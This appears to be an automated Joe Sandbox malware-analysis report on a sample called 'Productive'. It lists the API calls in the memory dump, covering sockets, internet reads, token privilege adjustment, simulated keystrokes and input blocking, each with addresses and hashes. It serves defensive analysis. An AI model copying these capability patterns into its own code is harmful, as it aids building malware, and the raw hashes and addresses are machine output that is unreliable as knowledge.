                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Find$File$CloseFirstMessageNextPeekSleep
                                                                                                                                                                • String ID: *.*
                                                                                                                                                                • API String ID: 3760556078-438819550
                                                                                                                                                                • Opcode ID: 87469648cb595deecc58ce8fb3736bb5cb8cdc2fc00604a8ee3ccbd40a6f23a7
                                                                                                                                                                • Instruction ID: 4c4f6f4c0bedf702d6d3d6851bb1986c23f3ad160b2aac591eb9140a839f27e6
                                                                                                                                                                • Opcode Fuzzy Hash: 87469648cb595deecc58ce8fb3736bb5cb8cdc2fc00604a8ee3ccbd40a6f23a7
                                                                                                                                                                • Instruction Fuzzy Hash: 9341947191421A9FCF1ADF64CC55AEEBBB4FF09350F148166E814A6291EB309E94CF90
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 002B29E2: GetWindowLongW.USER32(?,000000EB), ref: 002B29F3
                                                                                                                                                                • DefDlgProcW.USER32(?,?,?,?,?), ref: 002B1DD6
                                                                                                                                                                • GetSysColor.USER32(0000000F), ref: 002B1E2A
                                                                                                                                                                • SetBkColor.GDI32(?,00000000), ref: 002B1E3D
                                                                                                                                                                  • Part of subcall function 002B166C: DefDlgProcW.USER32(?,00000020,?), ref: 002B16B4
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ColorProc$LongWindow
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3744519093-0
                                                                                                                                                                • Opcode ID: b6c427834fc33eb2f041df2ac3bfab676309efe3bb9499e135529303590b2e06
                                                                                                                                                                • Instruction ID: 08364a684458c7b17c3035916fd7e92ec98d1dc8f306af7938a83360fa6e9f81
                                                                                                                                                                • Opcode Fuzzy Hash: b6c427834fc33eb2f041df2ac3bfab676309efe3bb9499e135529303590b2e06
                                                                                                                                                                • Instruction Fuzzy Hash: B0A17874139547BEDA3E6F2A8CA9EFB359DDB42381FE4010AF402D9195CB609D31C272
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 00328475: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 003284A0
                                                                                                                                                                • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00326E89
                                                                                                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 00326EB2
                                                                                                                                                                • bind.WSOCK32(00000000,?,00000010), ref: 00326EEB
                                                                                                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 00326EF8
                                                                                                                                                                • closesocket.WSOCK32(00000000,00000000), ref: 00326F0C
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 99427753-0
                                                                                                                                                                • Opcode ID: 5d3777bcb05fbe0a880c9a3dcd336f83bf3c94e44df1019770c62ff31bba4f99
                                                                                                                                                                • Instruction ID: 2eec66e4bd43277425d8d47f77e3240ce0bf798134d0191d9a8ced51176a0de8
                                                                                                                                                                • Opcode Fuzzy Hash: 5d3777bcb05fbe0a880c9a3dcd336f83bf3c94e44df1019770c62ff31bba4f99
                                                                                                                                                                • Instruction Fuzzy Hash: F441DF75710210AFDB15BF64A9C6FAE77A89F08754F058458FA45AB3C3CA70AD108FA1
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 292994002-0
                                                                                                                                                                • Opcode ID: 94b3e26dcdabe12be5cbaa74eca05893ba2c44b755d20975562566fec9229392
                                                                                                                                                                • Instruction ID: 316ff78a2f9bf08ce994114de0a60e21c18d68c53abb791d5263099d7c459417
                                                                                                                                                                • Opcode Fuzzy Hash: 94b3e26dcdabe12be5cbaa74eca05893ba2c44b755d20975562566fec9229392
                                                                                                                                                                • Instruction Fuzzy Hash: 2C1104363009129FE7231F669CC4B6E7BADEF45761F024529F906DB241CF34E9018AE0
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: LocalTime
                                                                                                                                                                • String ID: %.3d$WIN_XPe
                                                                                                                                                                • API String ID: 481472006-2409531811
                                                                                                                                                                • Opcode ID: 35545d78da81073b29c3ff28ac3b647da846f10946d5d5bc6ab6abd74e252afc
                                                                                                                                                                • Instruction ID: 414a97d5985ee7f422d1829dcf9b0a9c52034300513391a13cfb35568cfc5eeb
                                                                                                                                                                • Opcode Fuzzy Hash: 35545d78da81073b29c3ff28ac3b647da846f10946d5d5bc6ab6abd74e252afc
                                                                                                                                                                • Instruction Fuzzy Hash: 6BD0127283411CEAC7199A90C984DF9F37CAB04384F104466F706E2141DAB597B8AE26
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 002D9E3B: EnterCriticalSection.KERNEL32(002D1003,?,002D9CAC,0000000D), ref: 002D9E66
                                                                                                                                                                • GetTimeZoneInformation.KERNEL32(00375AF8,00000000,00000000,00000000,00000000,00000000,0036D070,00000030,002E3F1B,0036D050,00000008,002D70A8), ref: 002E4299
                                                                                                                                                                • WideCharToMultiByte.KERNEL32(?,00000000,00375AFC,000000FF,?,0000003F,00000000,?), ref: 002E4312
                                                                                                                                                                • WideCharToMultiByte.KERNEL32(?,00000000,00375B50,000000FF,FFFFFFFE,0000003F,00000000,?), ref: 002E434B
                                                                                                                                                                  • Part of subcall function 002D2F85: RtlFreeHeap.NTDLL(00000000,00000000,?,002D9C54,00000000,002D8D5D,002D59C3), ref: 002D2F99
                                                                                                                                                                  • Part of subcall function 002D2F85: GetLastError.KERNEL32(00000000,?,002D9C54,00000000,002D8D5D,002D59C3), ref: 002D2FAB
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ByteCharMultiWide$CriticalEnterErrorFreeHeapInformationLastSectionTimeZone
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1184061189-0
                                                                                                                                                                • Opcode ID: 3e19137234d94fd75d8794a269a740c3b48d8e381fdf5dea5b14dbed5633ec95
                                                                                                                                                                • Instruction ID: 36a6f853fa884c7b777fcdacb65b8f8bcd43cec9b5332dea1132354c2cd61744
                                                                                                                                                                • Opcode Fuzzy Hash: 3e19137234d94fd75d8794a269a740c3b48d8e381fdf5dea5b14dbed5633ec95
                                                                                                                                                                • Instruction Fuzzy Hash: 66A1E570DA02869EDF15EF6AD885BADBBB8BF05710FA4015AF414B7291D7708DA1CF20
                                                                                                                                                                APIs
                                                                                                                                                                • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00321ED6,00000000), ref: 00322AAD
                                                                                                                                                                • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00322AE4
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Internet$AvailableDataFileQueryRead
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 599397726-0
                                                                                                                                                                • Opcode ID: 1b020a9b25316a3e443266b4c9b0fa03c0adba2d8d1578023dec76a5532d23e6
                                                                                                                                                                • Instruction ID: 9cb9bce72fb40c40fe8b16f23365b2a673775d22cec45bea04e2741d5822bcac
                                                                                                                                                                • Opcode Fuzzy Hash: 1b020a9b25316a3e443266b4c9b0fa03c0adba2d8d1578023dec76a5532d23e6
                                                                                                                                                                • Instruction Fuzzy Hash: 0F41F571600219BFEB22DE54EC85EBBB7BCEB40754F10401EF605A7641EF71AE419A60
                                                                                                                                                                APIs
                                                                                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 003093E3
                                                                                                                                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00309410
                                                                                                                                                                • GetLastError.KERNEL32 ref: 0030941D
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 4244140340-0
                                                                                                                                                                • Opcode ID: a787a0ef8eb5c7c026cd851d1b8b20946617c05cd3decaea8aad518815196cf1
                                                                                                                                                                • Instruction ID: 68b29a88c7d533cf126b3386409d9385ac94159be069114ec2dc11f9f26c018c
                                                                                                                                                                • Opcode Fuzzy Hash: a787a0ef8eb5c7c026cd851d1b8b20946617c05cd3decaea8aad518815196cf1
                                                                                                                                                                • Instruction Fuzzy Hash: DA11BFB1524204AFD729DF64ECC5E2BB7BCFB44710B21812EF44986691EB30BC51CB60
                                                                                                                                                                APIs
                                                                                                                                                                • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00314271
                                                                                                                                                                • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 003142B2
                                                                                                                                                                • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 003142BD
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CloseControlCreateDeviceFileHandle
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 33631002-0
                                                                                                                                                                • Opcode ID: 9d9c96bab9ba963cede74b8ab8da0ba2463c75705765725b718de95ea194e166
                                                                                                                                                                • Instruction ID: 263f87854ef7245dde84259e277c82bf60ff19425967fbd303d9660114d4c9f5
                                                                                                                                                                • Opcode Fuzzy Hash: 9d9c96bab9ba963cede74b8ab8da0ba2463c75705765725b718de95ea194e166
                                                                                                                                                                • Instruction Fuzzy Hash: 81118E75E01228BFDB558FA5AC44BEFBFBCEB49B20F108556FD04E7280C6705A418BA1
                                                                                                                                                                APIs
                                                                                                                                                                • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00314F45
                                                                                                                                                                • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00314F5C
                                                                                                                                                                • FreeSid.ADVAPI32(?), ref: 00314F6C
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3429775523-0
                                                                                                                                                                • Opcode ID: d452cd02a8528b4b32cd363fdeb2ab91fe11144a1fde9ecbb681c131db84b845
                                                                                                                                                                • Instruction ID: d03a6dd69f705f3af71b24a9071b6dee0748872242097c007dee8a900c560689
                                                                                                                                                                • Opcode Fuzzy Hash: d452cd02a8528b4b32cd363fdeb2ab91fe11144a1fde9ecbb681c131db84b845
                                                                                                                                                                • Instruction Fuzzy Hash: DFF04F75A1130CBFDF04DFE0DD89AADB7BCEF08301F004469AA01E6180D7346A448B50
                                                                                                                                                                APIs
                                                                                                                                                                • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00311B01
                                                                                                                                                                • keybd_event.USER32(?,763AA2E0,?,00000000), ref: 00311B14
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InputSendkeybd_event
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3536248340-0
                                                                                                                                                                • Opcode ID: 1e6416f67eaa6a667defc2d429d6ed1021a616999e8f0414104d5007cb561cee
                                                                                                                                                                • Instruction ID: 50cd4593bc62f6deda3f5a8f035936f58d684425a96551c8ebfb8a611b881ec0
                                                                                                                                                                • Opcode Fuzzy Hash: 1e6416f67eaa6a667defc2d429d6ed1021a616999e8f0414104d5007cb561cee
                                                                                                                                                                • Instruction Fuzzy Hash: E0F0497590420DABDB05CF94C805BFE7BB8FF08316F00804AFE559A292D7799615DF94
                                                                                                                                                                APIs
                                                                                                                                                                • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,00329B52,?,0034098C,?), ref: 0031A6DA
                                                                                                                                                                • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,?,?,00329B52,?,0034098C,?), ref: 0031A6EC
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorFormatLastMessage
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3479602957-0
                                                                                                                                                                • Opcode ID: 436a321f13ab0599641106a5c8f223b2614bbc19bb4a07ed0cd5659e8ec1e9c2
                                                                                                                                                                • Instruction ID: 95b859c97bd17572ebe48cfc57a4a0928f291676c63b5f35b68893574b9f7a98
                                                                                                                                                                • Opcode Fuzzy Hash: 436a321f13ab0599641106a5c8f223b2614bbc19bb4a07ed0cd5659e8ec1e9c2
                                                                                                                                                                • Instruction Fuzzy Hash: E3F0273951522DBBDB21AFA4CC48FEA376CFF09361F008255B908D6181DA309960CFE1
                                                                                                                                                                APIs
                                                                                                                                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00308F27), ref: 00308DFE
                                                                                                                                                                • CloseHandle.KERNEL32(?,?,00308F27), ref: 00308E10
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 81990902-0
                                                                                                                                                                • Opcode ID: 053cba83bdf8e6b421c948a607767d8d790d216f167ab2ab3bb7eb87656e67b8
                                                                                                                                                                • Instruction ID: eb484a9d389f55d5252e4c1975e2f02ba8d9115972f6955196682e8cd3d61773
                                                                                                                                                                • Opcode Fuzzy Hash: 053cba83bdf8e6b421c948a607767d8d790d216f167ab2ab3bb7eb87656e67b8
                                                                                                                                                                • Instruction Fuzzy Hash: 14E0BF75110610EFE7662B60FC19D777BADEB04311B148919F99584470DB716CE0DB50
                                                                                                                                                                APIs
                                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,002D8F87,?,?,?,00000001), ref: 002DA38A
                                                                                                                                                                • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 002DA393
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ExceptionFilterUnhandled
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3192549508-0
                                                                                                                                                                • Opcode ID: 77ea236514e04e5a7c09c63e4a4264955e27dde76d5f24a04ec9a23001954366
                                                                                                                                                                • Instruction ID: 21ebae106fdcaea09a7f2366fb53939e97a46e39e30d9ae3b240dcc5d0794f48
                                                                                                                                                                • Opcode Fuzzy Hash: 77ea236514e04e5a7c09c63e4a4264955e27dde76d5f24a04ec9a23001954366
                                                                                                                                                                • Instruction Fuzzy Hash: FAB09239264208ABCA462F91EC09B883F6CEB46B62F004010FB4D48060CF7264508E91
                                                                                                                                                                APIs
                                                                                                                                                                • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 002D8874
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FeaturePresentProcessor
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2325560087-0
                                                                                                                                                                • Opcode ID: c7f2098213902b919cb1c4216edd52eb79ce7bc5414e57f75afa4ab36b809d6b
                                                                                                                                                                • Instruction ID: 11e151017598ed21b524f5fe19678779cedd89a9ae2321e552f3fd5893259066
                                                                                                                                                                • Opcode Fuzzy Hash: c7f2098213902b919cb1c4216edd52eb79ce7bc5414e57f75afa4ab36b809d6b
                                                                                                                                                                • Instruction Fuzzy Hash: D541C3B1D11602CBEB29CF59D8557A9BBE8FB44304F91802ED558E73A0C7B09CA0CF41
                                                                                                                                                                APIs
                                                                                                                                                                • BlockInput.USER32(00000001), ref: 003245F0
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: BlockInput
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3456056419-0
                                                                                                                                                                • Opcode ID: 2ab58862b431f4fd46a084630cdfed6040caae9de0d59cbf344f1e40e369ff6a
